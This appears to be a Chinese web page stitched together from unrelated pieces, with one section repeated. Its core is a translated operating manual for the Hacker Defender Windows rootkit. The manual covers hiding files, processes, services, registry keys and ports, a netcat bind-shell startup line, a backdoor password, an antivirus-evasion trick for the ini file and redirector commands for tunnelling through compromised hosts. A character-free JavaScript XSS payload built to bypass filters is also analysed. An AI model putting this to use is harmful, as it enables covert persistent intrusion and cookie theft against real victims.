hacker defend书籍里大多数的代码是什么语言的啊？我看不懂怎么办？要学什么才能看懂呢？

Hacker defender 使用

=====[1,目录]==============================================

1.

目录

2. 概要

2.1 关于

2.2 申明

3. 使用说明

4. Ini文件说明

5.

Backdoor

5.1 Redirector

6. 技术支持

6.1 版本

6.2

钩子API函数

6.3 已知的 bugs

7. Faq

8. 文件

=====[ 2.

关于]================================================

Hacker defender

(hxdef)是一个使用于Windows NT 4.0, Windows 2000 以及Windows

XP操作系统的一个NTROOKIT，它也能运行于之后的基于NT的操作系统。主要代码是由DELPHI

6完成。新的功能使用汇编书写。驱动代码由C完成。后门和redirector客服端大部分使用 Delphi 6完成。

=====[ 2.1 概要

]=============================================

程序的主要功能是在所有运行中的进程中重写分割内存，重写一些基本的模块改变进程的状态，它几乎能够改写所有不影响系统稳定和正在运行中的进程。

程序能够完全隐藏，现在能够做的有隐藏文件、进程、系统服务、系统驱动、注册表的键值和键、开放端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动，并且隐蔽地控制被隐藏进程。程序安装后能构造后门、注册表、系统服务，构造系统驱动。其本身的后门技术允许其植入

redirector。

=====[ 2.2

申明]====================================================

本项目1.0.0版本是开发源代码。

使用Hacker

defender所造成的后果作者本人概不负责。

=====[ 3. 用法

]==================================================

一个使用hxdef的简单例子:

hxdef100.exe [inifile]

或者

hxdef100.exe [switch]

直接执行EXE文件，不带任何的参数时候，默认的inifile文件为程序名.ini

。

当你执行hedef100不指定ini文件，或者你以参数模式运行时候，默认的文件是

hxdef100.ini。

下面的参数是有效的：

-:installonly - 只安装服务，不运行

-:refresh - 从INI文件中更新设置

-:noservice - 正常运行不安装服务

-:uninstall -

移除hxdef删除所有运行的后门连接，同时停止hxdef服务

例如:

hxdef100.exe

-:refresh

Hxdef拥有默认INI文件，但是我们强烈的推荐你建立自己的ini文件。关于ini文件的介绍可以看第4部分ini文件部分。

参数

-:refresh and -:uninstall

来源于本来的EXE文件。这就意味这你只要知道hxdef的运行路径和EXE名，就能够改变它的设置或者进行移除工作。

=====[ 4. Ini文件

]============================================

ini文件必须包含了9个部分： [Hidden Table],

[Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues],

[Startup Run], [Free Space], [Hidden Ports]和[Settings]。

在 [Hidden Table],

[Root Processes], [Hidden Services]和[Hidden RegValues]

中能够使用*代替后面的字符，星号仅仅使用于字符的后面，任何在*之前的都是无效的。所有的在字符之前和之后的空格也是无效的。

例如:

[Hidden

Table]

hxdef*

将开始隐藏所有在Hidden

Table中以"hxdef"开头的文件、文件夹和系统进程。

在该文件列表中的所有文件和文件夹都将在文件管理器中消失。在这个列表中的程序也会在任务管理器中被隐藏。必须确保主要文件，INI文件，你的后门文件和驱动文件被包含在列表中。

在程序列表中的主进程对感染具有免淤能力，你只能利用这些主程序才能看见隐藏的文件，文件夹和程序。所以，主进程是为rootkit管理员所使用的。

由服务和驱动所组成的Hidden

Services列表将会隐藏在数据库中的安装服务和驱动。rootkit主程序的服务名默认为HackerDefender100，rootkit驱动的驱动名默认为HackerDefenderDrv100。它们两者都可以通过ini文件进行修改。

Hidden

RegKeys中列出的注册表键值将会被隐藏，Rootkit在注册表中有四个键值：默认的是HackerDefender100,

LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100

如果你要重新命名服务名或者驱动名，你需要在列表中做相应的改变。

开始2个键值是和你的服务据用相同名字的，接下来的键值是LEGACY_名字。例如，如果你改变你的服务名称为BoomThisIsMySvc

，那么在注册表中，应该是这样表示的，LEGACY_BOOMTHISISMYSVC。

在Hidden

RegValues列出的注册表的值将会被隐藏。

Startup

Run列表中列出的是rootkit程序运行之后的自启动程序。这些程序和ROOTKIT具有一样的特权。程序名和它后面的参数以？分开。不要使用"字符，程序将会在用户登陆以后终止，在用户登陆以后可以使用一般和常见的方法。你可以使用下面这些快捷方式。

%cmd%标准系统的shell和路径

%cmddir%标准系统的shell文件夹

%sysdir%

- 系统文件夹

(e.g. C:\winnt\system32\)

%windir% -

标准系统文件夹

(e.g. C:\winnt\)

%tmpdir% - 临时文件夹

(e.g. C:\winnt\temp\)

例如：1)

[Startup Run]

c:\sys\nc.exe?-L -p

100 -t -e cmd.exe

nc－shell将会在rootkit运行以后监听100端口

2)

[Startup

Run]

%cmd%?/c echo Rootkit started at %TIME%

%tmpdir%starttime.txt

将rootkit启动时间保存在系统临时文件夹夹starttime。Txt文件。

（%TIME%仅仅运行于Windows2000以上的操作系统。）

Free

Space中列出的驱动硬盘名和容量大小是你想增加的硬盘，它的格式是X:NUM，其中X表示磁盘驱动器的名称，NUM表示你要增加的磁盘的容量。

例如：

[Free

Space]

C:123456789

这将在C盘增加大约123M的磁盘空间。

Hidden

Ports中列出的是你需要隐藏程序的端口，比如使用OpPorts, FPort, Active Ports, Tcp

View等的程序，它最多拥有2行。第1行的格式是TCP:tppport1,tcpport2,tcpport3

，第2行的格式是UDP:udpport1,udpport2,udpport3 ...例如：

1)

[Hidden

Ports]

TCP:8080,456

这将隐藏2个TCP端口：8080和456

2)

[Hidden

Ports]

TCP:8001

UDP:12345

这将隐藏2个端口：TCP的8001和UDP的12345。

3)

[Hidden

Ports]

TCP:

UDP:53,54,55,56,800

隐藏5个端口，都为UDP端口：53，54，55，56，800。

Settings包含了8个值：Password,

BackdoorShell, FileMappingName, ServiceName,ServiceDisplayName,

ServiceDescription, DriverName 和

DriverFileName。

名。

16位字符的Password被用于后门链接和转向，密码能根据短一些，余下的用空格代替。

BackdoorShell是复制于系统的SHELL文件，它被后门创建于一个临时的目录下。

FileMappingName，当钩子进程被存储时，用于共享内存。

ServiceName是rootkit服务

ServiceDisplayName为rootkit显示的服务

ServiceDescription位rootkit的服务描述

DriverName以hxdef驱动命名

DriverFileName以hxdef驱动文件命名

例如；

[Settings]

Password=hxdef-rulez

BackdoorShell=hxdef?.exe

FileMappingName=_.-=[Hacker

Defender]=-._

ServiceName=HackerDefender100

ServiceDisplayName=HXD Service

100

ServiceDescription=powerful NT

rootkit

DriverName=HackerDefenderDrv100

DriverFileName=hxdefdrv.sys

这就意味着你的后门密码为hxdef-rulez，后门将复制系统shell文件（通常是CMD.EXE）为hxdef?.exe到临时目录。共享内存将变为"_.-=[Hacker

Defender]=-._"，服务名为"HackerDefender100"，它显示的名称为"HXD Service 100"，它的描述为"poweful NT

rootkit"，驱动名为"HackerDefenderDrv100"，驱动将被存储于一个叫做"hxdefdrv.sys"的文件中。

扩展字符|,

, , :, \, / 和 "在所有的行中都会被忽略，除了[Startup Run], [Free Space] 和 [Hidden

Ports] 项目和在 [Settings] 中first =

character后面的值。使用扩展字符能然你的INIFILE文件摆脱杀毒软件的查杀。

例如：

Example:

[Hidden

Ta/"ble]

h"xdef"*

和下面的是一样的。

[Hidden

Table]

hxdef*

更多的例如可以参照hxdef100.ini

和hxdef100.2.ini文件。

所有的在ini文件中的字符串除了那些在Settings 和 Startup

Run中的，都是无效的。

=====[ 5. Backdoor

]=========================================

Rootkit程序

Hook了一些API的功能，连接接收一些来自网络的数据包。如果接收的数据等于256个字节，密码和服务被确认，复制的SHELL被临时创建，这种情况建立以后，下一次的数据接收被重定向到这个SHELL上。

因为rootkit程序

Hook了系统中所有进程，所有在服务器上的TCP端口都将变为后门。例如，如果目标主机开放了提供HTTP服务的80端口，这个端口也能作为一个有效的后门。例外的是这个开放端口的进程不会被Hook，这个后门仅仅工作于服务器的接收缓冲大于或者等于256个字节。但是这个特征几乎适合于所有标准的服务，像IIS,APACHE,ORACLE等。后门能够隐藏是因为所有的数据都通过系统上面提供的服务转发。所以你不能使用一些简单的端口扫描软件找到它，并且它能轻易的穿过防火墙。

在测试发现IIS服务过程中，HTTP服务不能记录任何的连接日记，FTP和SMTP服务器仅仅能记录结束的断开连接。所以，如果你运行hxdef在有IIS

Web服务的服务器上面，HTTP端口跟你是连接机器使用的后门的最好端口。

如果你想连接后门的话，你将不得不使用使用一些特别的客户端，程序bdcli100.exe就是被用于如此的。

用法：bdcli100.exe

host port password

例如：

bdcli100.exe www.windowsserver.com 80

hxdef-rulez

连接服务器www.windowsserver.com使用默认的密码。客户端1.0.0版本不兼容其他老的版本。

=====[

5.1 Redirector

]==========================================

Redirector是基于后门技术。第一个连接包和后门连接一样。这就意味着你能使用相同的端口。下一个包是仅仅为Redirector特殊的包，这些包由基于运行用户电脑的重定向器生成.第一个重定向的包连接特定的目标主机和端口。

Redirectors的设置保存在与EXE文件同名的INI文件中（所以默认的是rdrbs100.ini）。如果这个文件不存在，那么在EXE文件运行的时候它会自动建立一个。最好不要额外的修改INI文件。所有的设置都可以在console中进行改变。

当ROOTKIT被安装时，如果我们需要使用服务器上面的redirectors功能，我们首先要在本地运行程序。在控制台上我们可以在有HXDEF的服务器上面建立一个映射端口路由。最后我们连接本地端口并且转换数据。转向的数据被rootkit的密码加密。在这个版本中连接的速度被限制在256K左右。在这个版本中redirectors并不适合于高速连接。Redirectors也会受到安装有rootkit的服务器的限制，而且Redirectors仅仅使用TCP协议连接。在这个版本中Redirectors

base有19条命令，他们并不是非常的敏感。关于功能的详细描述可以使用HELP命令。在Redirectors

base启动时，startup-list中的命令也被执行。startup-list中的命令可以用使用SU启动的CMD进行编辑。

Redirector区分于2种连接类型（HTTP和其他）。如果连接是其他类型的，数据包将不会被改变。如果是HTTP类型，在HTTP文件头的HOST参数将会改变为目标服务器。一个base的最大Redirector数量是1000。

Redirector仅仅适用于NT结构，只有在拥有图标的NT程序下你才能使用HIDE命令隐藏控制台。只有在NT下才能无声无息的运行，没有数据输出，没有图标，仅仅执行startup-list中的命令。例子：1)得到端口映射信息

MPINFO

No mapped ports in the

list.

2）增加MPINFO命令到startup-list并且得到startup-list中的命令。

SUADD

MPINFO

sulist

0) MPINFO

3）使用HELP命令。

HELP

Type HELP COMMAND for command details.

Valid commands

are:

HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD,

DEL,

DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT,

TEST

HELP ADD

Create mapped port. You have to specify domain

when using HTTP

type.

usage: ADD LOCAL PORT MAPPING

SERVER MAPPING SERVER PORT

TARGET

SERVER

TARGET SERVER PORT PASSWORD [TYPE] [DOMAIN]

HELP

EXIT

Kill this application. Use DIS flag to discard unsaved data.

usage: EXIT

[DIS]

4）增加端口映射，我们在本地100端口进行监听，ROOTKIT安装在服务器200.100.2.36的80端口上，目标服务器是www.google.com80端口。，rootkit的密码是bIgpWd，连接类型HTTP，目标主机（www.google.com）我们知道它的IP地址是216.239.53.100。

ADD 100

200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com

ADD命令可以不加任何参数的运行，在这个例子中我们要求每一个参数都要分开。

5）现在我们再使用MPINFO检查一下映射端口

MPINFO

There are 1 mapped ports in the list. Currently 0 of them

open.

6）列举端口映射表：

LIST

000)

:100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP

7）一个端口映射的详细描述：

DETAIL

Listening on port: 100

Mapping server address:

200.100.2.36

Mapping server port: 80

Target server address:

216.239.53.100

Target server port: 80

Password: bIgpWd

Port

type: HTTP

Domain name for HTTP Host: www.google.com

Current state:

CLOSED

8）在没有密码的情况下，我们能在端口映射服务器200.100.2.36上测试rootkit是否已经安装（但是如果我们能确认它这样做就不再需要）

TEST 0

Testing 0) 200.100.2.36:80:bIgpWd –

OK

如果测试失败则显示：

Testing 0) 200.100.2.36:80:bIgpWd -

FAILED

9）在我们没使用之前端口仍然是没有开放的。我们不得不使用OPEN命令打开它，当端口开放时，我们也能使用CHOSE命令关闭端口。我们能使用标志符ALL应用这些命令在列表中的所有端口，这个过程可能需要一段的时间。

OPEN 0

Port number 0 opened.

CLOSE 0

Port number 0

closed.

或者 OPEN ALL

Port number 0

opened.

10）要保存当前的设置和列表我们可以使用SAVE命令，将保存所有的设置到ini文件中。（保存也会通过命令EXIT执行，而不需要DIS标志）

SAVE Saved

successfully.

开的端口能够转换我们需要的所有数据。限制你能打开你喜欢的浏览器输入网址http://localhost:100/，如果没有什么问题的话，你会看见打开的是www.google.com的主页。

第一个数据包跟你会延迟5秒钟左右，但是其他的限制仅仅取决于服务器的速度，根据这个版本的转向技术，你联网的速度大约在256K左右。

=====[

6.

技术发行]========================================

这部分包含了一些对于普通用户无关紧要的信息。这部分可能适合所有的测试者和开发人员阅读

怎么才能读懂代码？

学命令行，批处理

学VBScript

学C

学汇编语言

学ASP

学SQL

如果你想做个小混混，用搜索工具搜索好溢出工具攻击一下之类的，你只学命令行和批处理就够了。

Javascript 看看黑客怎么写的 [转]

它可以在大部分浏览器上运行。（虽然目前我测试过手头的浏览器都能运行，但理论上不能保证所有浏览器都能正确运行，原因见下文） 这段代码的好处（对于黑客）是，它不包含任何字符或数字，可以逃过某些过滤器的检查。比如说，如果假定一个AJAX请求将返回一个只包含数字的JSON，于是很可能会简单判断了一下其中不含字母就直接eval了，结果给黑客们留下了后门。上面的代码功能很简单，只是alert(1)，但使用同样的原理，完全可以干出更复杂的事，例如alert(document.cookie)。更重要的是，这段代码再一次提醒我，黑客的想象力是无限的……正如Ryan Barnett的演讲标题："XSS:The only rule is no rule"。 我们可以把它分为两个部分来理解： 第一部分： ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])() 第二部分：[__[_/_]+__[_+~$]+$_[_]+$$](_/_) 其中第一部分是核心，我们首先对它进行分析，先缩进一下： ($= [$=[]][ (__=!$+$)[_=-~-~-~$] + ({}+$)[_/_] + ($$= ($_=!''+$)[_/_] + $_[+$]) ] )() 显然，最外层是(...)()形式的函数调用，我们需要看看这里究竟调用了什么函数，返回了什么。下一步，我们把原来代码中赋值表达式提取出来，将其改写为以下等价形式：$ = []; //1 __ = !$+$; //2 _ = -~-~-~$; //3 $_=!''+$; //4 $$ = $_[_/_] + $_[+$]; //5 $= [$][ __[_] + //6 ({}+$)[_/_] + //7 $$ //8 ]; //9 $(); //10 现在来一行行看： 1. $先赋值为一个空数组 （后面会被覆盖） 2. __ = ![] + [] = false + [] = "false" 这里利用了javascript运算的强制类型转换特性。首先空数组是一个非null值，因此![]的结果是false（布尔型）。在计算false + []时，由于数组对象无法与其他值相加，在加法之前会先做一个toString的转换，空数组的toString就是""，因此事实上在计算false + ""。这时false被自动转换为字符串。最终结果是"false"+"" = "false"。 **换句话说，在$为空数组时，使用 “+$”的方式可以将任何一个值转为字符串** 3. 在计算~[]时，~需要一个数字操作数，空数组无法直接转换为数字，则作为0处理。因此~[] = ~0 = -1。 参考： ~3 = -4 ~[3] = -4 ~[3,2] = -1 (无法转为数字） ~"3" = -4 ~"abc" = -1 因此: _ = -~-~-~[] = -~-~-(-1) = -~-~1 = -~-(-2) = -~2 = -(-3) = 3 理论上，可以用这种方式得出1-9所有数字 4. !''是true，使用+$将其变为字符串 "true" 5. 这里需要注意的是，之前一直用“值+[]”来获得“值”的字符串形式。而“+[]”则是0（正号导致[]被自动转换为数值0）。因此：$$ = "true"[3/3] + "true"[+[]] = "true"[1] + "true"[0] = "rt" 6. __[_] = "false"[3] = "s" 7. ({} + [])导致空对象{}被转换为字符串"[object Object]", 因此({}+$)[_/_] = "[object Object]"[1] = "o" 9. 这里把$覆盖为 [[]]["s"+"o"+"rt"]。注意这里[[]]本身是一个包含空数组的数组，其实对这一步来说，任何一个数组都没有关系（不一定要是嵌套数组），但作者巧妙地把$的首次赋值式放在了数组内部，使代码更为紧凑。最终结果是，$ = [[]]["sort"] = [[]].sort = Array.prototype.sort。 10. 调用$()，作为整个表达式最终的取值。需要注意，$是全局范围的，是window的一个属性，相当于window.$。而Array.prototype.sort会返回this。对于window.$来说，this就是window。因此，整个第一部分的值，就是window本身！当然，这个过程的正确运作依赖于当前浏览器的Array.prototype.sort实现能对this为window的情况容错。 通过第一部分，我们已经获得将任何值转换为字符串的简单方法，并能产生任意的数值，理论上就可以从javascript的取值系统中提取出大部分字母（不知道是不是全部，需要考证）。并且，我们获取到了window的引用。下面就可以开始上下其手，为所欲为了。木哈哈哈哈哈！ 可以看出，上面的第10步是与浏览器的具体实现相关的，因此也存在着某些浏览器下需要对代码作出修改的可能。 现在看第二部分，事实上已经非常明朗了,唯一需要注意的是，现在$是一个函数，因此~$ = ~0 （无法直接转换为数字则作为0处理） = -1。[__[_/_]+__[_+~$]+$_[_]+$$](_/_) = ["false"[1]+"false"[3+(-1)]+"true"[3]+"rt"](1) = ["a"+"l"+"e"+"rt"](1) 所以，整条式子相当于：window["alert"](1) 最后只想再感慨一次：黑客的想象力是无限的。理解代码并不难，问题是一开始时他们是怎么能想出来的。。。

如何快速看懂别人的代码

读程序的能力要靠基本功和经验帮忙，一般多写写代码就可以提高了。

1. 每个人都有自己的思维习惯，因此再乱的代码也有自己的风格。比如命名, 比如UI的时候习惯先写Insert动作等等. 找到这些地方可以帮助阅读代码。

2. 一般情况都可以从界面录入着手读代码, 先搞清楚有那些输入，做了什么, 有什么输出。之后在看代码的细节会比较容易。

3. 多多利用错误调试的技巧，通过断点，日志可以帮助找到出问题所在的位置。

4. 如果一段代码很乱，又有问题，对逻辑有把握的话，最好重写。浪费时间去读懂不如重新写一遍来的效率。

5. 基本功如果不扎实的话,建议一边补课一边读程序。

怎么样快速看懂别人的代码

读程序的能力要靠基本功和经验帮忙，一般多写写代码就可以提高了。

1. 每个人都有自己的思维习惯，因此再乱的代码也有自己的风格。比如命名, 比如UI的时候习惯先写Insert动作等等. 找到这些地方可以帮助阅读代码。

2. 一般情况都可以从界面录入着手读代码, 先搞清楚有那些输入，做了什么, 有什么输出。之后在看代码的细节会比较容易。

3. 多多利用错误调试的技巧，通过断点，日志可以帮助找到出问题所在的位置。

4. 如果一段代码很乱，又有问题，对逻辑有把握的话，最好重写。浪费时间去读懂不如重新写一遍来的效率。

5. 基本功如果不扎实的话,建议一边补课一边读程序。

黑客中的代码指什么

每个程序，每个病毒都是由代码构成的，黑客的代码有很多，比如：免杀，过杀毒软件等等。